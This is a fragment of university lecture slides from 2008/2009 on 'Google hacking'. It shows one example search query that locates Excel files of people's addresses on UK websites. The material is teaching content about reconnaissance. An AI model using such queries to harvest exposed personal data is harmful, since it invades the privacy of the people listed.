RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example: searching database of address people written in EXCEL focusing to UK sitefiletype:xls address site:uk
More on Google hacking
yp
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009